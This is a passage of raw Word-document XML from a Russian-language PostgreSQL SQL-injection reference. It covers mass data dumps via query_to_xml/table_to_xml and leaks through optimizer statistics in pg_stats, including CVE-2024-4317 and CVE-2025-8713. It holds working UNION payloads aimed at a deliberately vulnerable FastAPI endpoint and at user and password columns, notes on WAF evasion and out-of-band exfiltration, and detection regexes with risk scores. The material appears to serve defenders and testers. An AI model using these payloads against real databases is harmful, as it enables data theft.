        </w:rPr>
        <w:t xml:space="preserve">, через тот же executor. Это не privilege bypass — функция не повышает привилегий; она просто компактно упаковывает результат.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Возвращаемый тип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 формально отдельный type в PG, но имеет implicit cast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и наоборот. Через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каст явный и работает в UNION без warnings.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Сериализация: каждая колонка результата идёт в XML-элемент с именем колонки. Имена колонок берутся из output-headers планировщика — атакующий контролирует их через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AS alias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query_to_xml('SELECT password AS pw FROM users', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> даст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;pw&gt;...&lt;/pw&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (полезно для коротких имён, экономии трафика, обхода фильтров).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Limit на размер XML — общий PG memory-cap (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">work_mem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, по умолчанию 4MB на операцию). Большая таблица не упадёт сразу, потому что результат строится через streaming, но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собирает всё в одну строку до возврата — для row-count &gt;&gt; 10k практически всегда упирается в RAM или таймаут.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под капотом — итерация по всем таблицам с SELECT-доступом и склейка их </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table_to_xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-ов в один документ. Не атомарная транзакция, но snapshot одной читающей транзакции — консистентность гарантирована.</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17.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table_to_xml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стабильны с 8.3.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 требуются — функции в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на функции; SELECT на колонки/таблицы, к которым обращается query внутри. Это значит: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не повышает привилегий</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий видит то же, что увидел бы прямым SELECT. Польза — в компактности, а не в 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Конфиги GUC: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обрезает большие дампы (</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на mid-size БД часто таймаутится при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">statement_timeout = 30s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стандарт для web-приложений). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">work_mem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> определяет, поместится ли результат в RAM до записи.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должен быть скомпилирован с `--with-libxml`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (это дефолт во всех мажорных дистрибуциях PG: PGDG-репо для Debian/Ubuntu/RHEL, official Windows installer, all official Docker images). Без libxml функции отсутствуют. На редких минималистичных сборках (custom Alpine без libxml) — отсутствуют, проверяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\df query_to_xml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SELECT 1 FROM pg_proc WHERE proname = 'query_to_xml'</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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — почти всегда атака. Легитимные use case: SOAP/XML-интеграции (вымирающий вид, остался в enterprise/банковском legacy), некоторые BI-инструменты. В современных web-приложениях (REST/JSON, GraphQL) XML-сериализация на стороне БД не используется — приложение само формирует JSON.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table_to_xml(... )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — то же; единственный реальный легитимный use case — admin-задачи backup/export, и они идут под dedicated DBA-ролью, не из application.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 почти никогда не легитимно. Один use case — старый export-инструмент. От application — однозначно атака.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Маркер атаки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_activity.query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query_to_xml('SELECT ... FROM &lt;user_table&gt;', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от роли, которая по бизнес-логике XML не возвращает. Особенно подозрительно — когда query внутри обращается к чувствительным таблицам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accounts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api_keys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Нормализованный отпечаток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$1, query_to_xml($2, $3, $4, $5)::text, $6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — характерная форма с function-call в SELECT-листе и pure-literal аргументами.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Дополнительный косвенный сигнал — резкий пик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">work_mem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-использования (видно в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_activity.backend_xid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + сравнение с базовой загрузкой) во время инъекции, если payload собрал большой XML.</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Работает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без изменений. Семантика стабильна с 8.3.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все три функции доступны на AWS RDS / Google Cloud SQL / Supabase — это часть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провайдеры их не отключают. Ограничение по объёму — общий лимит на размер HTTP-ответа application (обычно 1-10MB) и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(на managed обычно жёстче, чем на self-hosted: 30s типично). Детально по провайдерам —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3.1.x (UNION-based)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 это way around подбора колонок. На практике атакующий пробует 3.1 первым (быстрее) и переключается на 3.8.5, если число колонок не подбирается или WAF блокирует.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3.8.1, 3.8.2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query_to_xml('SELECT * FROM pg_class ...', ...)</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table_to_xml('pg_proc'::regclass, ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — компактный дамп самих системных каталогов одним вызовом. Иногда удобнее, чем 3.8.1/3.8.2 напрямую.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3.11.3</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xpath()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для парсинга XML внутри SQL. Цепочка: 3.8.5 → 3.11.3 для error-based/boolean-blind использования query_to_xml-результата.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3.6.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — XML-результат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можно отправить через OOB-канал (3.6.1 DNS / 3.6.2 SSRF) с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">encode(query_to_xml(...)::text::bytea, 'hex')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, если HTTP-ответ невидим.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table_to_xml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в regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.8.1) добавить ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query_to_xml|table_to_xml|database_to_xml|query_to_xmlschema|table_to_xmlschema|database_to_xmlschema</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risk_score = 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (выше, чем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потому что легитимных use case значительно меньше; ниже, чем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Payload B). Сводный regex для всей категории 3.8 — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.8.md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XML Functions — Mapping Tables to XML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Source: src/backend/utils/adt/xml.c — реализация query_to_xml / table_to_xml / database_to_xml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SQL/XML — ISO/IEC 9075-14:2008 (SQL:2003 Part 14, обзор)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(XML extraction)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query_to_xml mass dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.6 pg_stats и pg_stats_ext — утечка через optimizer statistics (R17, R26)</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pg_catalog.pg_stats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view поверх </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, агрегатов планировщика (most common values, histogram bounds, n_distinct, null_frac). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_catalog.pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — view над </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic_ext_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, расширенные статистики (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE STATISTICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Сама </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_statistic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступна только superuser-у; views реализуют per-column ACL — фильтруют строки так, чтобы роль видела только статистику для колонок, на которые у неё SELECT. Этот ACL-фильтр исторически имел регрессии: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CVE-2024-4317 (R17)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — до 14.12 / 15.7 / 16.3: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не применяет фильтр на колонки, у роли видны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чужих таблиц без SELECT-привилегии.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CVE-2025-8713 (R26)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — до 13.22 / 14.19 / 15.14 / 16.10 / 17.6: custom operator в WHERE-условии, направленный на колонку view/RLS-таблицы, получает сырые значения из underlying-статистики на этапе планировщика — фактически обход view-ACL и RLS через optimizer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сам по себе утечённый канал — фрагментарный (top-N значений колонки, не полные строки), но для колонок с низкой кардинальностью (статусы, флаги, домены email-ов, типы платежей, и особенно — реально использующиеся пароли в weakly-secured системах) это уже значительная часть содержимого таблицы. Для CVE-2024-4317 критично, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">установка патча на бинаре не закрывает дыру автоматически</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — нужно вручную выполнить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в каждой БД, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template0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template1</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app/api/v1/dashboard.py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@router.get("/dashboard")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def dashboard(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    widget: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f"SELECT id, title, value FROM widgets WHERE name = '{widget}'"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Три колонки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Статистика приводится к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через явный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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">anyarray</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A — `pg_stats` baseline (роль имеет SELECT на колонку)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Базовый канал, работает на любой версии PG и не требует никакого CVE. Атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет SELECT на колонку, но не хочет/не может извлекать полные строки (например, таблица большая, в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уже агрегированы наиболее частые значения).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `widget`):</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attname, most_common_vals::text FROM pg_stats WHERE schemaname = 'public' AND tablename = 'users' AND most_common_vals IS NOT NULL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value FROM widgets WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT 0, attname, most_common_vals::text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_stats</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
